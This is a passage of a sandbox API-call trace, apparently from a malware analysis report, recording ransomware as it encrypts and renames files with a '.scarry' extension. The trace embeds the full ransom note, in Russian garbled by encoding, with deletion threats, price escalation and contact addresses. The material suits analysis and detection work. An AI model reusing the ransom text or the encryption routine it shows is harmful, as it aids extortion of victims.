lpMultiByteStr=".fltShared\\GRPHFLT\\CGMIMP32.FLT", lpUsedDefaultChar=0x0) returned 4 [0110.417] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 0x58b060 [0110.417] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0110.417] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0110.417] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0110.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", dwFileAttributes=0x20) returned 1 [0110.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0110.448] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0110.448] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x4f160 [0110.448] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0110.448] ReadFile (in: hFile=0x19c, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0110.452] GlobalLock (hMem=0x450004) returned 0x591988 [0110.452] GlobalLock (hMem=0x45000c) returned 0x597998 [0110.456] GlobalHandle (pMem=0x597998) returned 0x45000c [0110.456] GlobalUnlock (hMem=0x45000c) returned 0 [0110.456] GlobalReAlloc (hMem=0x45000c, dwBytes=0x4000, uFlags=0x2) returned 0x45000c [0110.456] GlobalLock (hMem=0x45000c) returned 0x597998 [0110.456] GlobalHandle (pMem=0x597998) returned 0x45000c [0110.456] GlobalUnlock (hMem=0x45000c) returned 0 [0110.456] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0110.456] GlobalLock (hMem=0x45000c) returned 0x597998 [0110.456] GlobalHandle (pMem=0x591988) returned 0x450004 [0110.456] GlobalUnlock (hMem=0x450004) returned 0 [0110.456] GlobalHandle (pMem=0x597998) returned 0x45000c [0110.456] GlobalUnlock (hMem=0x45000c) returned 0 [0110.457] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.457] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.457] GlobalUnlock (hMem=0x45000c) returned 0 [0110.457] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0110.457] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.457] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.457] GlobalUnlock (hMem=0x45000c) returned 0 [0110.457] ReadFile (in: hFile=0x19c, lpBuffer=0x1e4d360, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0110.458] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x0 [0110.458] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0110.458] SetFilePointer (in: hFile=0x19c, lDistanceToMove=323936, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x4f160 [0110.458] WriteFile (in: hFile=0x19c, lpBuffer=0x1e4d360*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0110.461] WriteFile (in: hFile=0x19c, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0110.461] WriteFile (in: hFile=0x19c, lpBuffer=0x1ea1d38*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d38*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 [0110.983] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79fd8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79fd8*, lpNumberOfBytesWritten=0x18ea30*=0x9c, lpOverlapped=0x0) returned 1 [0110.983] CloseHandle (hObject=0x19c) returned 1 [0111.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry") returned 39 [0111.084] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pb1c1oigbnlterxma2ur8tni8fwiiiao.scarry")) returned 1 [0111.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pb1c1oigbnlterxma2ur8tni8fwiiiao.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.085] SetFileTime (hFile=0x19c, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0111.085] CloseHandle (hObject=0x19c) returned 1 [0111.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry", dwFileAttributes=0x20) returned 1 [0111.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0111.086] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.086] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.086] GlobalUnlock (hMem=0x45000c) returned 0 [0111.086] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.086] GlobalLock (hMem=0x450004) returned 0x593998 [0111.086] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.086] GlobalUnlock (hMem=0x45000c) returned 0 [0111.086] GlobalHandle (pMem=0x593998) returned 0x450004 [0111.086] GlobalUnlock (hMem=0x450004) returned 0 [0111.086] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.087] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.087] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe872300, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfe872300, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe872300, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0111.087] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0111.087] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0111.087] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0111.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] ReadFile (in: hFile=0x19c, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0111.088] CloseHandle (hObject=0x19c) returned 1 [0111.088] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0111.088] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0111.088] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0111.088] GlobalLock (hMem=0x450004) returned 0x591988 [0111.088] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.088] GlobalUnlock (hMem=0x450004) returned 0 [0111.088] GlobalLock (hMem=0x450004) returned 0x591988 [0111.088] GlobalLock (hMem=0x45000c) returned 0x593998 [0111.088] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.088] GlobalUnlock (hMem=0x450004) returned 0 [0111.088] GlobalHandle (pMem=0x593998) returned 0x45000c [0111.088] GlobalUnlock (hMem=0x45000c) returned 0 [0111.088] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0111.089] CharLowerBuffW (in: lpsz="CGMIMP32.FNT", cchLength=0xc | out: lpsz="cgmimp32.fnt") returned 0xc [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", lpUsedDefaultChar=0x0) returned 67 [0111.089] CharLowerBuffW (in: lpsz=".FNT", cchLength=0x4 | out: lpsz=".fnt") returned 0x4 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".fnt", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".fntShared\\GRPHFLT\\CGMIMP32.FNT", lpUsedDefaultChar=0x0) returned 4 [0111.090] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 0x58b060 [0111.090] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0111.090] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0111.090] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0111.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", dwFileAttributes=0x20) returned 1 [0111.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.091] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0111.091] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x93f6e [0111.091] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0111.091] ReadFile (in: hFile=0x19c, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0111.123] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.123] GlobalLock (hMem=0x450004) returned 0x597998 [0111.123] GlobalHandle (pMem=0x597998) returned 0x450004 [0111.123] GlobalUnlock (hMem=0x450004) returned 0 [0111.123] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0111.123] GlobalLock (hMem=0x450004) returned 0x597998 [0111.123] GlobalHandle (pMem=0x597998) returned 0x450004 [0111.123] GlobalUnlock (hMem=0x450004) returned 0 [0111.123] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0111.123] GlobalLock (hMem=0x450004) returned 0x597998 [0111.123] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.123] GlobalUnlock (hMem=0x45000c) returned 0 [0111.127] GlobalHandle (pMem=0x597998) returned 0x450004 [0111.127] GlobalUnlock (hMem=0x450004) returned 0 [0111.128] GlobalLock (hMem=0x450004) returned 0x591988 [0111.128] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.128] GlobalUnlock (hMem=0x450004) returned 0 [0111.128] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0111.128] GlobalLock (hMem=0x450004) returned 0x591988 [0111.128] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.128] GlobalUnlock (hMem=0x450004) returned 0 [0111.128] ReadFile (in: hFile=0x19c, lpBuffer=0x1e4d360, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0111.136] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x0 [0111.136] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0111.137] SetFilePointer (in: hFile=0x19c, lDistanceToMove=606062, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x93f6e [0111.137] WriteFile (in: hFile=0x19c, lpBuffer=0x1e4d360*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0111.249] WriteFile (in: hFile=0x19c, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0111.251] WriteFile (in: hFile=0x19c, lpBuffer=0x1ea1d28*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d28*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 [0111.386] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79f28*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesWritten=0x18ea30*=0x9c, lpOverlapped=0x0) returned 1 [0111.387] CloseHandle (hObject=0x19c) returned 1 [0111.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry") returned 39 [0111.465] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), lpNewFileName="C:\\Program 